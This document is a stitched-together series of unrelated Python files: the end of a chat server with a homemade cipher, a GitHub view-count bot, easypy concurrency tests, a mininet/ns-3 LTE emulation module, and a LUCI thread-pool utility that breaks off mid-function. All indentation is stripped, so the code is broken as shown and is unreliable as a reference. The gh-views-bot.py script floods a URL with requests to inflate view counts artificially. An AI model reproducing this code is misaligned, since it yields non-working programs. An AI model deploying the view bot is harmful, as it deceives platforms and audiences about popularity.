['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '35', '7f', '37', '64', '43', '2d', '39', '6e', '2b', '5b', '46', '32', '30', '3a', '36', '2e', '31', '3b', '27', '7d', '65', '6d', '2f', '2c', '42', '49', '21', '63', '33', '7e', '47', '57', '45', '3f', '41', '3c', '3d', '3e', '44', '5a', '7a', '52', '76', '23', '4c', '6a', '24', '67', '22', '5c', '5f', '61', '5d', '25', '40', '4a', '66', '5e', '69', '60', '4b', '6b', '7c', '4f', '51', '62', '77', '54', '78', '56', '48', '58', '53', '72', '34', '55', '75', '38', '79', '6c', '29', '70', '7b', '26', '73', '2a', '59', '50', '4d', '68', '20', '28', '6f', '71', '74', '4e']
]
hexlist = []
for char in inp:
hexlist.append(str(char.encode("hex")))
addlist = []
maxi = len(inp)
if len(inp) < 28:
for num in range(28 - maxi):
if tick == maxi:
tick = 0
addlist.append(hexlists[num + maxi - 1][int(hexlist[tick], 16)])
else:
addlist.append(hexlists[num + maxi - 1][int(hexlist[tick], 16)])
tick = tick + 1
for hexi in addlist:
hexlist.append(hexi)
hexlist1 = []
for hexdig in hexlist:
tmp = ""
if hexdig[1] == 0 or hexdig[1] == 1 or hexdig[1] == 8 or hexdig[1] == 9 or hexdig[1] == "a" or hexdig[1] == "b" or hexdig[1] == "c" or hexdig[1] == "d" or hexdig[1] == "e" or hexdig[1] == "f":
tmp = hexdig[1]
tmp = tmp + hexdig[0]
else:
tmp = hexdig
hexlist1.append(tmp)
evens = []
odds = []
for hexdig in hexlist1:
evens.append(hexdig[0])
odds.append(hexdig[1])
odds[len(odds) - 1]
odds1 = [odds[len(odds) - 1]]
tick = 0
for odd in odds:
if tick == len(odds) - 1:
pass
else:
tick = tick + 1
odds1.append(odd)
hexlist = []
for tick in range(len(evens)):
hexlist.append(evens[tick] + odds1[tick])
outp = ""
for hexdig in hexlist:
outp = outp + hexdig.decode("hex")
return outp
BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[:-ord(s[len(s)-1:])]
def ping(sock):
while True:
sock.send("ping")
time.sleep(1)
class AESCipher:
def __init__( self, key ):
self.key = key
def encrypt( self, raw ):
raw = pad(raw)
iv = Random.new().read( AES.block_size )
cipher = AES.new( self.key, AES.MODE_CBC, iv )
return base64.b64encode( iv + cipher.encrypt( raw ) )
def decrypt( self, enc ):
enc = base64.b64decode(enc)
iv = enc[:16]
cipher = AES.new(self.key, AES.MODE_CBC, iv )
return unpad(cipher.decrypt( enc[16:] ))
if __name__ == "__main__":
threading.Thread(target = writeoutput,args = (q,errors)).start()
threading.Thread(target = console,args = (q, errors, motd)).start()
Server('', port ,q, motd, errors, mesg, quit, online, conn, c).listen()
|
gh-views-bot.py
|
import sys
import time
import threading
import requests
from utils import to_int_or
CURSOR_UP_ONE = '\x1b[1A'
ERASE_LINE = '\x1b[2K'
def request_task(url, data, headers):
requests.get(url, json=data, headers=headers)
def fire_and_forget(url, json={}, headers={}):
threading.Thread(target=request_task, args=(url, json, headers)).start()
def increse_views(url, num, timeout):
print()
for i in range(num):
fire_and_forget(url)
sys.stdout.flush()
print(f"{CURSOR_UP_ONE}{ERASE_LINE}Added: {i+1}/{num}")
time.sleep(timeout / 1000)
def increse_views_infinite(url, timeout):
print()
i = 0
while True:
fire_and_forget(url)
sys.stdout.flush()
print(f"{CURSOR_UP_ONE}{ERASE_LINE}Added: {i+1}/...")
time.sleep(timeout / 1000)
i += 1
def get_argv_or(argname, default):
return sys.argv[sys.argv.index(argname) + 1] if (argname in sys.argv) else default
URL = sys.argv[sys.argv.index("-url") + 1]
num = to_int_or(get_argv_or("-n", "10"), 10)
timeout = to_int_or(get_argv_or("-t", "1000"), 1000)
print("views increaser:")
try:
if "--infinite" in sys.argv:
increse_views_infinite(URL, timeout)
else:
increse_views(URL, num, timeout)
except KeyboardInterrupt:
print(f"{ERASE_LINE}>>> Exit <<<")
|
test_concurrency.py
|
from unittest.mock import patch
import pytest
from time import sleep
from easypy.threadtree import get_thread_stacks, ThreadContexts
from easypy.concurrency import concurrent, MultiObject, MultiException
@pytest.yield_fixture(params=[True, False], ids=['concurrent', 'nonconcurrent'])
def concurrency_enabled_and_disabled(request):
if request.param: # concurrency enabled
yield
else: # concurrency disabled
from easypy.concurrency import disable, enable
try:
disable()
yield
finally:
enable()
def test_thread_stacks():
with concurrent(sleep, .1, threadname='sleep'):
print(get_thread_stacks().render())
def test_thread_contexts_counters():
TC = ThreadContexts(counters=('i', 'j'))
assert TC.i == TC.j == 0
with TC(i=1):
def check1():
assert TC.i == 1
assert TC.j == 0
with TC(i=1, j=1):
def check2():
assert TC.i == 2
assert TC.j == 1
with concurrent(check2):
pass
with concurrent(check1):
pass
def test_thread_contexts_counters_multiobject():
TC = ThreadContexts(counters=('i',))
assert TC.i == 0
print("---")
@TC(i=True)
def test(n):
print(n, TC._context_data)
sleep(.1)
return TC.i
test(0)
ret = MultiObject(range(10)).call(test)
assert set(ret) == {1}
def test_thread_context_stacks():
TC = ThreadContexts(stacks=('i', 'j'))
assert TC.i == TC.j == []
with TC(i='a'):
def check1():
assert TC.i == ['a']
assert TC.j == []
with TC(i='i', j='j'):
def check2():
assert TC.i == ['a', 'i']
assert TC.j == ['j']
with concurrent(check2):
pass
with concurrent(check1):
pass
def test_multiobject_0():
x = MultiObject([]).foo()
assert len(x) == 0
assert x.__class__.CONCESTOR is object
def test_multiobject_1():
m = MultiObject(range(10))
def mul(a, b, *c):
return a * b + sum(c)
assert sum(m.call(mul, 2)) == 90
assert sum(m.call(mul, b=10)) == 450
assert sum(m.call(mul, 1, 1, 1)) == 65
assert m.filter(None).T == (1, 2, 3, 4, 5, 6, 7, 8, 9)
assert sum(m.denominator) == 10
with pytest.raises(MultiException) as info:
m.call(lambda i: 1 / (i % 2))
assert info.value.count == 5
assert info.value.common_type == ZeroDivisionError
assert not info.value.complete
def test_multiobject_exceptions():
assert MultiException[ValueError] is MultiException[ValueError]
assert issubclass(MultiException[UnicodeDecodeError], MultiException[UnicodeError])
assert issubclass(MultiException[UnicodeDecodeError], MultiException[ValueError])
with pytest.raises(AssertionError):
MultiException[0]
with pytest.raises(MultiException):
MultiObject(range(5)).call(lambda n: 1 / n)
with pytest.raises(MultiException[Exception]):
MultiObject(range(5)).call(lambda n: 1 / n)
with pytest.raises(MultiException[ZeroDivisionError]):
MultiObject(range(5)).call(lambda n: 1 / n)
try:
MultiObject(range(5)).call(lambda n: 1 / n)
except MultiException[ValueError] as exc:
assert False
except MultiException[ZeroDivisionError] as exc:
assert len(exc.actual) == 1
assert isinstance(exc.one, ZeroDivisionError)
else:
assert False
with pytest.raises(MultiException[ArithmeticError]):
try:
MultiObject(range(5)).call(lambda n: 1 / n)
except ZeroDivisionError:
assert False # shouldn't be here
except MultiException[ValueError]:
assert False # shouldn't be here
class ExceptionForPicklingTest(ArithmeticError):
pass
def test_multiexception_pickling():
import pickle
import multiprocessing
def throw(n):
if not n:
raise ExceptionForPicklingTest(n)
def fail_and_dump(queue):
try:
MultiObject(range(5)).call(throw)
except MultiException[ArithmeticError] as exc:
p = pickle.dumps(exc)
queue.put_nowait(p)
queue = multiprocessing.Queue(1)
process = multiprocessing.Process(target=fail_and_dump, args=(queue,))
process.start()
process.join()
p = queue.get_nowait()
exc = pickle.loads(p)
assert isinstance(exc, MultiException[ExceptionForPicklingTest])
assert exc.common_type is ExceptionForPicklingTest
assert exc.exceptions[0].args == (0,)
assert exc.exceptions[1:] == [None] * 4
def test_multiobject_concurrent_find_found():
m = MultiObject(range(10))
from time import sleep
ret = m.concurrent_find(lambda n: sleep(n / 10) or n) # n==0 is not nonzero, so it's not eligible
assert ret == 1
def test_multiobject_concurrent_find_not_found():
m = MultiObject(range(10))
ret = m.concurrent_find(lambda n: n < 0)
assert ret is False
m = MultiObject([0] * 5)
ret = m.concurrent_find(lambda n: n)
assert ret == 0
def test_multiobject_concurrent_find_proper_shutdown():
executed = []
m = MultiObject(range(10), workers=1)
ret = m.concurrent_find(lambda n: [print(n) or executed.append(n) or sleep(.01)])
assert ret
sleep(1) # wait for potential stragglers
assert max(executed) <= 2
def test_multiobject_zip_with():
m = MultiObject(range(4))
with pytest.raises(AssertionError):
m.zip_with(range(3), range(5)) # too few objects
m.zip_with(range(5), range(6)) # too many objects
ret = m.zip_with(range(1, 5)).call(lambda a, b: a + b).T
assert ret == (1, 3, 5, 7)
def test_multiobject_enumerate():
m = MultiObject(range(5), log_ctx="abcd")
def check(i, j):
assert i == j + 1
e = m.enumerate(1)
assert e._log_ctx == tuple("abcd")
e.call(check)
def test_multiobject_logging():
m = MultiObject(range(4), log_ctx="abcd", initial_log_interval=0.1)
def check(i):
sleep(.2)
# we'll mock the logger so we can ensure it logged
with patch("easypy.concurrency._logger") as _logger:
m.call(check)
args_list = (c[0] for c in _logger.info.call_args_list)
for args in args_list:
assert "test_multiobject_logging.<locals>.check" == args[2]
assert "easypy/tests/test_concurrency.py" in args[4]
def test_multiobject_types():
assert isinstance(MultiObject(range(5)), MultiObject[int])
assert not isinstance(MultiObject(range(5)), MultiObject[str])
class A(): ...
class B(A): ...
assert issubclass(MultiObject[A], MultiObject)
assert not issubclass(MultiObject[A], A)
assert issubclass(MultiObject[B], MultiObject[A])
assert not issubclass(MultiObject[A], MultiObject[B])
assert isinstance(MultiObject([B()]), MultiObject[A])
assert not isinstance(MultiObject([A()]), MultiObject[B])
assert isinstance(MultiObject[A]([B()]), MultiObject[A])
assert isinstance(MultiObject[A]([B()]), MultiObject[B])
assert isinstance(MultiObject[int](range(5)), MultiObject[int])
with pytest.raises(TypeError):
assert MultiObject[str](range(5))
assert isinstance(MultiObject[str]("123").call(int), MultiObject[int])
def test_multiobject_namedtuples():
from collections import namedtuple
class Something(namedtuple("Something", "a b")):
pass
def ensure_not_expanded(something):
# This will probably fail before these asserts
assert hasattr(something, 'a')
assert hasattr(something, 'b')
objects = [Something(1, 2), Something(2, 3), Something(3, 4)]
MultiObject(objects).call(ensure_not_expanded)
@pytest.mark.usefixtures('concurrency_enabled_and_disabled')
def test_multiexception_api():
with pytest.raises(MultiException) as exc:
MultiObject([0, 5]).call(lambda i: 10 // i)
failed, sucsessful = exc.value.futures
assert failed.done()
with pytest.raises(ZeroDivisionError):
failed.result()
assert isinstance(failed.exception(), ZeroDivisionError)
assert sucsessful.done()
assert sucsessful.result() == 2
assert sucsessful.exception() is None
def test_multiexception_types():
class OK(Exception):
pass
class BAD(object):
pass
class OKBAD(OK, BAD):
pass
with pytest.raises(AssertionError):
MultiException[BAD]
def raise_it(typ):
raise typ()
with pytest.raises(MultiException[OK]):
MultiObject([OK]).call(raise_it)
with pytest.raises(MultiException[OKBAD]):
MultiObject([OKBAD]).call(raise_it)
with pytest.raises(MultiException[OK]):
MultiObject([OKBAD]).call(raise_it)
@pytest.mark.parametrize('throw', [False, True])
def test_concurrent_done_status(throw):
from threading import Event
continue_func = Event()
def func():
continue_func.wait()
if throw:
raise Exception()
with concurrent(func, throw=False) as c:
assert not c.done()
continue_func.set()
sleep(0.1)
assert c.done()
assert c.done()
def test_concurrent_real_thread():
from easypy.concurrency import IS_GEVENT
from gevent.monkey import get_original
import logging
sleep = get_original("time", "sleep")
current_thread = get_original("threading", "get_ident")
main_thread = current_thread()
ran = 0
def log_and_sleep():
nonlocal ran
logging.info("test")
sleep(.1)
ran += 1
return current_thread()
if IS_GEVENT:
before = ran
with concurrent(log_and_sleep, real_thread_no_greenlet=True) as c:
pass
result = c.result()
assert ran == before + 1
assert main_thread != result
before = ran
with concurrent(log_and_sleep) as c:
pass
result = c.result()
assert ran == before + 1
assert main_thread == result
else:
before = ran
with concurrent(log_and_sleep, real_thread_no_greenlet=True) as c:
pass
result = c.result()
assert ran == before + 1
assert main_thread != result
before = ran
with concurrent(log_and_sleep) as c:
pass
result = c.result()
assert ran == before + 1
assert main_thread != result
assert ran
|
lte.py
|
import re
import socket
from time import sleep
import mininet.node
import mininet.link
from mininet.log import info
from mininet.util import moveIntf
from mininet.cluster.link import RemoteLink
class Lte (object):
def __init__ (self, tdf=1, mode='Master', imsiBase=0, cellIdBase=0,
ueIpBase='7.0.0.1', ueGwIpAddr='7.0.0.1',
pgwIpBase='1.0.0.0', pgwMask='255.0.0.0',
epcSwitch=None, agentIp=None, agentPort=53724, logFile=None,
homeEnbTxPower=30.0, slaveName='slaveTap'):
if epcSwitch == None:
info ('*** error: epcSwitch is a required argument.\n')
return
elif agentIp == None:
info ('*** error: agentIp is a required argument.\n')
return
self.epcSwitch = epcSwitch
self.ueIpBase = ueIpBase
self.ueGwIpAddr = ueGwIpAddr
self.tapBridgeIntfs = []
self.ueIndex = -1
self.startAgent ()
self.csock = None
while self.csock == None:
self.csock = self.connectAgent (agentIp, agentPort)
if mode == 'Master':
self.addEpcEntity (self.epcSwitch, 'pgwTap')
self.addEpcEntity (self.epcSwitch, 'sgwTap')
self.addEpcEntity (self.epcSwitch, 'mmeTap')
self.addEpcEntity (self.epcSwitch, 'masterTap')
self.nextAddr = 2
elif mode == 'Slave':
IpBase = re.sub (r'[0-9]*\.([0-9]*\.[0-9]*\.[0-9])', r'0.\1', ueIpBase)
self.csock.sendall ('Config.SetDefault ("ns3::TapEpcHelper::EpcSlaveDeviceName", StringValue ("{0}"))\n'.format (slaveName))
self.csock.sendall ('Config.SetDefault ("ns3::TapEpcHelper::SlaveUeIpAddressBase", StringValue ("{0}"))\n'.format (IpBase))
self.csock.sendall ('Config.SetDefault ("ns3::TapEpcHelper::SlaveIpAddressBase", StringValue ("{0}"))\n'.format (IpBase))
self.addEpcEntity (self.epcSwitch, slaveName)
self.nextAddr = 1
else:
info ('*** error: mode should be Master or Slave.\n')
self.csock.sendall ("exit")
return
self.csock.sendall ('LogComponentEnable ("TapEpcHelper", LOG_LEVEL_ALL)\n')
self.csock.sendall ('LogComponentEnable ("TapEpcMme", LOG_LEVEL_ALL)\n')
self.csock.sendall ('LogComponentEnable ("EpcSgwPgwApplication", LOG_LEVEL_ALL)\n')
self.csock.sendall ('LogComponentEnable ("FdNetDevice", LOG_LEVEL_DEBUG)\n')
self.csock.sendall ('LogComponentEnable ("TeidDscpMapping", LOG_LEVEL_LOGIC)\n')
self.csock.sendall ('LogComponentEnable ("TapEpcEnbApplication", LOG_LEVEL_ALL)\n')
self.csock.sendall ('GlobalValue.Bind ("SimulatorImplementationType", StringValue ("ns3::RealtimeSimulatorImpl"))\n')
self.csock.sendall ('GlobalValue.Bind ("ChecksumEnabled", BooleanValue (True))\n')
self.csock.sendall ('Config.SetDefault ("ns3::LteSpectrumPhy::CtrlErrorModelEnabled", BooleanValue (False))\n')
self.csock.sendall ('Config.SetDefault ("ns3::LteSpectrumPhy::DataErrorModelEnabled", BooleanValue (False))\n')
self.csock.sendall ('Config.SetDefault ("ns3::TcpSocket::SegmentSize", UintegerValue (2440))\n')
self.csock.sendall ('Config.SetDefault ("ns3::LteHelper::Scheduler", StringValue ("ns3::FdMtFfMacScheduler"))\n')
self.csock.sendall ('Config.SetDefault ("ns3::TapEpcHelper::Mode", StringValue ("{0}"))\n'.format (mode))
self.csock.sendall ('Config.SetDefault ("ns3::LteEnbPhy::TxPower", DoubleValue ({0}))\n'.format (homeEnbTxPower))
self.csock.sendall ('LteTimeDilationFactor.SetTimeDilationFactor ({0})\n'.format (tdf))
if logFile != None:
self.csock.sendall ('Config.SetDefault ("ns3::TapEpcHelper::LogFile", StringValue ("{0}"))\n'.format (logFile))
self.csock.sendall ('attachDelay = 10.0\n')
self.csock.sendall ('lteHelper = LteHelper ()\n')
self.csock.sendall ('lteHelper.SetImsiCounter ({0})\n'.format (imsiBase))
self.csock.sendall ('lteHelper.SetCellIdCounter ({0})\n'.format (cellIdBase))
self.csock.sendall ('tapEpcHelper = TapEpcHelper ()\n')
self.csock.sendall ('lteHelper.SetEpcHelper (tapEpcHelper)\n')
self.csock.sendall ('tapEpcHelper.Initialize ()\n')
if mode == 'Master':
self.csock.sendall ('pgw = tapEpcHelper.GetPgwNode ()\n')
self.csock.sendall ('tap = TapFdNetDeviceHelper ()\n')
self.csock.sendall ('tap.SetDeviceName ("pgwTap")\n')
self.csock.sendall ('tap.SetTapMacAddress (Mac48Address.Allocate ())\n')
self.csock.sendall ('pgwDevice = tap.Install (pgw)\n')
self.csock.sendall ('ipv4Helper = Ipv4AddressHelper ()\n')
self.csock.sendall ('ipv4Helper.SetBase (Ipv4Address ("{0}"), Ipv4Mask ("{1}"))\n'.format (pgwIpBase, pgwMask))
self.csock.sendall ('pgwIpIfaces = ipv4Helper.Assign (pgwDevice)\n')
self.csock.sendall ('mobility = MobilityHelper ()\n')
self.csock.sendall ('enbLteDevs = NetDeviceContainer ()\n')
self.csock.sendall ('ueLteDevs = NetDeviceContainer ()\n')
self.csock.sendall ('internetStack = InternetStackHelper ()\n')
self.csock.sendall ('internetStack.SetIpv6StackInstall (False)\n')
self.csock.sendall ('Simulator.Schedule (Seconds (attachDelay), LteHelper.Attach, lteHelper, ueLteDevs)\n')
self.csock.sendall ('def run ():\n')
self.csock.sendall (' Simulator.Stop (Seconds (86400))\n')
self.csock.sendall (' Simulator.Run ()\n')
self.csock.sendall ('nsThread = Thread (target = run)\n')
self.csock.sendall ('tapBridges = []\n')
def startAgent (self):
self.epcSwitch.rcmd ("/usr/bin/opennet-agent.py start")
def stopAgent (self):
self.epcSwitch.rcmd ("/usr/bin/opennet-agent.py stop")
def connectAgent (self, ip, port):
csock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
try:
info ('*** Connecting to opennet-agent... ')
csock.connect ((ip, port))
except socket.error, exc:
info ('Failed\n')
return None
else:
info ('Successed\n')
return csock
def addEpcEntity (self, node, intfName):
port = node.newPort ()
self.TapIntf (intfName, node, port)
def addEnb (self, node, intfName, mobilityType="ns3::ConstantPositionMobilityModel", position=None, velocity=None):
port = node.newPort ()
self.TapIntf (intfName, node, port)
self.csock.sendall ('nsNode = Node ()\n')
self.csock.sendall ('mobility.SetMobilityModel ("{0}")\n'.format (mobilityType))
self.csock.sendall ('mobility.Install (nsNode)\n')
if position != None:
self.csock.sendall ('mm = nsNode.GetObject(MobilityModel.GetTypeId())\n')
self.csock.sendall ('mm.SetPosition(Vector({0}, {1}, {2}))\n'.format (position[0], position[1], position[2]))
if velocity != None and mobilityType == "ns3::ConstantVelocityMobilityModel":
self.csock.sendall ('mm = nsNode.GetObject(MobilityModel.GetTypeId())\n')
self.csock.sendall ('mm.SetVelocity(Vector({0}, {1}, {2}))\n'.format (velocity[0], velocity[1], velocity[2]))
self.csock.sendall ('enbLteDev = lteHelper.InstallEnbDevice (NodeContainer (nsNode))\n')
self.csock.sendall ('enbLteDevs.Add (enbLteDev)\n')
def addUe (self, node, mobilityType="ns3::ConstantPositionMobilityModel", position=None, velocity=None):
self.ueIndex += 1
node.cmd ('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
port = node.newPort ()
intfName = "{0}-eth{1}".format (node.name, port)
self.csock.sendall ('nsNode = Node ()\n')
self.csock.sendall ('mobility.SetMobilityModel ("{0}")\n'.format (mobilityType))
self.csock.sendall ('mobility.Install (nsNode)\n')
if position != None:
self.csock.sendall ('mm = nsNode.GetObject(MobilityModel.GetTypeId())\n')
self.csock.sendall ('mm.SetPosition(Vector({0}, {1}, {2}))\n'.format (position[0], position[1], position[2]))
if velocity != None and mobilityType == "ns3::ConstantVelocityMobilityModel":
self.csock.sendall ('mm = nsNode.GetObject(MobilityModel.GetTypeId())\n')
self.csock.sendall ('mm.SetVelocity(Vector({0}, {1}, {2}))\n'.format (velocity[0], velocity[1], velocity[2]))
self.csock.sendall ('ueLteDev = lteHelper.InstallUeDevice (NodeContainer (nsNode))\n')
self.csock.sendall ('ueLteDevs.Add (ueLteDev)\n')
self.csock.sendall ('internetStack.Install (nsNode)\n')
self.csock.sendall ('tapEpcHelper.AssignUeIpv4Address (ueLteDev)\n')
self.csock.sendall ('gatewayMacAddr = tapEpcHelper.GetUeDefaultGatewayMacAddress ()\n')
ueIp = self.allocateIp ()
tbIntf = self.TapBridgeIntf (intfName, node, port, self.ueGwIpAddr, ueIp, self.epcSwitch, self.csock)
self.tapBridgeIntfs.append (tbIntf)
return ueIp, self.ueIndex
def addEpsBearer (self, ueIndex=0, localPortStart=0, localPortEnd=65535, remotePortStart=0, remotePortEnd=65535, qci='EpsBearer.NGBR_VIDEO_TCP_DEFAULT'):
self.csock.sendall ('tft = EpcTft ()\n')
self.csock.sendall ('pf = EpcTft.PacketFilter ()\n')
self.csock.sendall ('pf.localPortStart = {0}\n'.format (localPortStart))
self.csock.sendall ('pf.localPortEnd = {0}\n'.format (localPortEnd))
self.csock.sendall ('pf.remotePortStart = {0}\n'.format (remotePortStart))
self.csock.sendall ('pf.remotePortEnd = {0}\n'.format (remotePortEnd))
self.csock.sendall ('tft.Add (pf)\n')
self.csock.sendall ('bearer = EpsBearer ({0})\n'.format (qci))
self.csock.sendall ('Simulator.Schedule (Seconds (attachDelay), LteHelper.ActivateDedicatedEpsBearer, lteHelper, ueLteDevs.Get ({0}), bearer, tft)\n'.format (ueIndex))
def allocateIp (self):
pat = '[0-9]*\.[0-9]*\.[0-9]*\.'
base = (re.findall (pat, self.ueIpBase))[0]
ip = "{0}{1}".format (base, self.nextAddr)
self.nextAddr += 1
return ip
def start (self):
self.csock.sendall ('if nsThread.isAlive ():\n csock.sendall ("True")\nelse:\n csock.sendall ("False")\n')
while True:
data = self.csock.recv (1024)
if data == "True":
info ('*** NS-3 thread is already running\n')
return
elif data == "False":
info ('*** Starting NS-3 thread\n')
break
self.disableIpv6 (self.epcSwitch)
self.csock.sendall ('nsThread.start ()\n')
info ('*** moveIntoNamespace\n')
for tbIntf in self.tapBridgeIntfs:
info ('{0} '.format (tbIntf.name))
tbIntf.moveIntoNamespace ()
info ('\n')
self.enableIpv6 (self.epcSwitch)
def stop (self):
self.csock.sendall ('Simulator.Stop (Seconds (1))\n')
self.csock.sendall ('while nsThread.isAlive ():\n sleep (0.1)\n')
def clear (self):
self.csock.sendall ('Simulator.Destroy ()\n')
self.csock.sendall ('exit ()\n')
self.csock.close ()
self.stopAgent ()
def disableIpv6 (self, node):
node.rcmd ('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
def enableIpv6 (self, node):
node.rcmd ('sysctl -w net.ipv6.conf.all.disable_ipv6=0')
class TapIntf (mininet.link.Intf):
"""
TapIntf is a Linux TAP interface.
"""
def __init__ (self, name=None, node=None, port=None, **params):
self.name = name
self.node = node
self.createTap (self.name)
mininet.link.Intf.__init__ (self, self.name, node, port, **params)
def createTap (self, name):
self.node.cmd ('ip tuntap add {0} mode tap'.format (name))
class TapBridgeIntf (mininet.link.Intf):
"""
TapBridgeIntf is a Linux TAP interface, which is bridged with an NS-3 NetDevice.
"""
def __init__ (self, name=None, node=None, port=None, ueGwIpAddr=None, ueIp=None,
localNode=None, csock=None, **params):
self.name = name
self.node = node
self.ueGwIpAddr = ueGwIpAddr
self.ueIp = ueIp
self.localNode = localNode
self.csock = csock
self.createTap (self.name)
self.delayedMove = True
if node.inNamespace == True:
self.inRightNamespace = False
else:
self.inRightNamespace = True
mininet.link.Intf.__init__ (self, name, node, port, **params)
self.csock.sendall ('nsDevice = ueLteDev.Get (0)\n')
self.csock.sendall ('tapBridgeHelper = TapBridgeHelper ()\n')
self.csock.sendall ('tapBridgeHelper.SetAttribute ("Mode", StringValue ("ConfigureLocal"))\n')
self.csock.sendall ('tapBridgeHelper.SetAttribute ("DeviceName", StringValue ("{0}"))\n'.format (self.name))
self.csock.sendall ('macAddress = Mac48Address.Allocate ()\n')
self.csock.sendall ('tapBridgeHelper.SetAttribute ("MacAddress", Mac48AddressValue (macAddress))\n')
self.csock.sendall ('tb = tapBridgeHelper.Install (nsNode, nsDevice)\n')
self.csock.sendall ('tapBridges.append (tb)\n')
self.csock.sendall ('dev = nsDevice.GetObject (LteUeNetDevice.GetTypeId ())\n')
self.csock.sendall ('dev.SetMacAddress (macAddress)\n')
self.csock.sendall ('dev.SetGatewayMacAddress (gatewayMacAddr)\n')
def moveIntoNamespace (self):
while True:
self.csock.sendall ('if tapBridges[-1].IsLinkUp():\n csock.sendall ("True")\nelse:\n csock.sendall ("False")\n')
data = self.csock.recv (1024)
if data == "True":
break
else:
sleep (0.1)
RemoteLink.moveIntf (self.name, self.node)
self.node.cmd ('ip link set dev {0} up'.format (self.name))
self.node.cmd ('ip addr add dev {0} {1}/8'.format (self.name, self.ueIp))
self.node.cmd ('ip route add default via {0}'.format (self.ueGwIpAddr))
self.node.cmd ('arp -s {0} 00:00:00:00:00:00'.format (self.ueGwIpAddr))
pat = '[0-9]*\.'
route = (re.findall (pat, self.ueIp))[0] + '0.0.0'
self.node.cmd ('ip route del {0}/8'.format (route))
def cmd (self, *args, **kwargs):
if self.inRightNamespace == True:
return self.node.cmd (*args, **kwargs)
else:
return self.localNode.cmd (*args, **kwargs)
def createTap (self, name):
self.node.cmd ('ip tuntap add {0} mode tap'.format (name))
self.node.cmd ('ip link set dev {0} netns 1'.format (name))
|
threading_utils.py
|
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Classes and functions related to threading."""
import functools
import inspect
import logging
import os
import queue
import sys
import threading
import time
import traceback
# Priorities for tasks in AutoRetryThreadPool, particular values are important.
PRIORITY_HIGH = 1 << 8
PRIORITY_MED = 2 << 8
PRIORITY_LOW = 3 << 8
class LockWithAssert:
"""Wrapper around (non recursive) Lock that tracks its owner."""
def __init__(self):
self._lock = threading.Lock()
self._owner = None
def __enter__(self):
self._lock.acquire()
assert self._owner is None
self._owner = threading.current_thread()
def __exit__(self, _exc_type, _exec_value, _traceback):
self.assert_locked('Releasing unowned lock')
self._owner = None
self._lock.release()
return False
def assert_locked(self, msg=None):
"""Asserts the lock is owned by running thread."""
assert self._owner == threading.current_thread(), msg
class ThreadPoolError(Exception):
"""Base class for exceptions raised by ThreadPool."""
class ThreadPoolEmpty(ThreadPoolError):
"""Trying to get task result from a thread pool with no pending tasks."""
class ThreadPoolClosed(ThreadPoolError):
"""Trying to do something with a closed thread pool."""
class ThreadPool:
"""Multithreaded worker pool with priority support.
When the priority of tasks match, it works in strict FIFO mode.
"""
QUEUE_CLASS = queue.PriorityQueue
# Enqueueing None causes the worker to stop.
# Python3 doesn't support to compare None with any integer, so putting None
# in priority queue will cause exception. Switch to use sys.maxsize, since
# lower priority takes precedence.
TASK_END_SENTINEL = (sys.maxsize,)
def __init__(self, initial_threads, max_threads, queue_size, prefix=None):
"""Immediately starts |initial_threads| threads.
Arguments:
initial_threads: Number of threads to start immediately. Can be 0 if it is
uncertain that threads will be needed.
max_threads: Maximum number of threads that will be started when all the
threads are busy working. Often the number of CPU cores.
queue_size: Maximum number of tasks to buffer in the queue. 0 for
unlimited queue. A non-zero value may make add_task()
blocking.
prefix: Prefix to use for thread names. Pool's threads will be
named '<prefix>-<thread index>'.
"""
prefix = prefix or 'tp-0x%0x' % id(self)
logging.debug(
'New ThreadPool(%d, %d, %d): %s', initial_threads, max_threads,
queue_size, prefix)
assert initial_threads <= max_threads
assert max_threads <= 1024
self.tasks = self.QUEUE_CLASS(queue_size)
self._max_threads = max_threads
self._prefix = prefix
# Used to assign indexes to tasks.
self._num_of_added_tasks_lock = threading.Lock()
self._num_of_added_tasks = 0
# Lock that protected everything below (including conditional variable).
self._lock = threading.Lock()
# Condition 'bool(_outputs) or bool(_exceptions) or _pending_count == 0'.
self._outputs_exceptions_cond = threading.Condition(self._lock)
self._outputs = []
self._exceptions = []
# Number of pending tasks (queued or being processed now).
self._pending_count = 0
# List of threads.
self._workers = []
# Number of threads that are waiting for new tasks.
self._ready = 0
# Number of threads already added to _workers, but not yet running the loop.
self._starting = 0
# True if close was called. Forbids adding new tasks.
self._is_closed = False
for _ in range(initial_threads):
self._add_worker()
def _add_worker(self):
"""Adds one worker thread if there isn't too many. Thread-safe."""
with self._lock:
if len(self._workers) >= self._max_threads or self._is_closed:
return False
worker = threading.Thread(
name='%s-%d' % (self._prefix, len(self._workers)), target=self._run)
self._workers.append(worker)
self._starting += 1
logging.debug('Starting worker thread %s', worker.name)
worker.daemon = True
worker.start()
return True
def add_task(self, priority, func, *args, **kwargs):
"""Adds a task, a function to be executed by a worker.
Arguments:
- priority: priority of the task versus others. Lower priority takes
precedence.
- func: function to run. Can either return a return value to be added to the
output list or be a generator which can emit multiple values.
- args and kwargs: arguments to |func|. Note that if func mutates |args| or
|kwargs| and that the task is retried, see
AutoRetryThreadPool, the retry will use the mutated
values.
Returns:
Index of the item added, e.g. the total number of enqueued items up to
now.
"""
assert isinstance(priority, int)
assert callable(func)
with self._lock:
if self._is_closed:
raise ThreadPoolClosed('Can not add a task to a closed ThreadPool')
start_new_worker = (
# Pending task count plus new task > number of available workers.
self.tasks.qsize() + 1 > self._ready + self._starting and
# Enough slots.
len(self._workers) < self._max_threads
)
self._pending_count += 1
with self._num_of_added_tasks_lock:
self._num_of_added_tasks += 1
index = self._num_of_added_tasks
self.tasks.put((priority, index, func, args, kwargs))
if start_new_worker:
self._add_worker()
return index
def _run(self):
"""Worker thread loop. Runs until a None task is queued."""
# Thread has started, adjust counters.
with self._lock:
self._starting -= 1
self._ready += 1
while True:
try:
task = self.tasks.get()
finally:
with self._lock:
self._ready -= 1
try:
if task == self.TASK_END_SENTINEL:
# We're done.
return
_priority, _index, func, args, kwargs = task
if inspect.isgeneratorfunction(func):
for out in func(*args, **kwargs):
self._output_append(out)
else:
out = func(*args, **kwargs)
self._output_append(out)
except Exception as e:
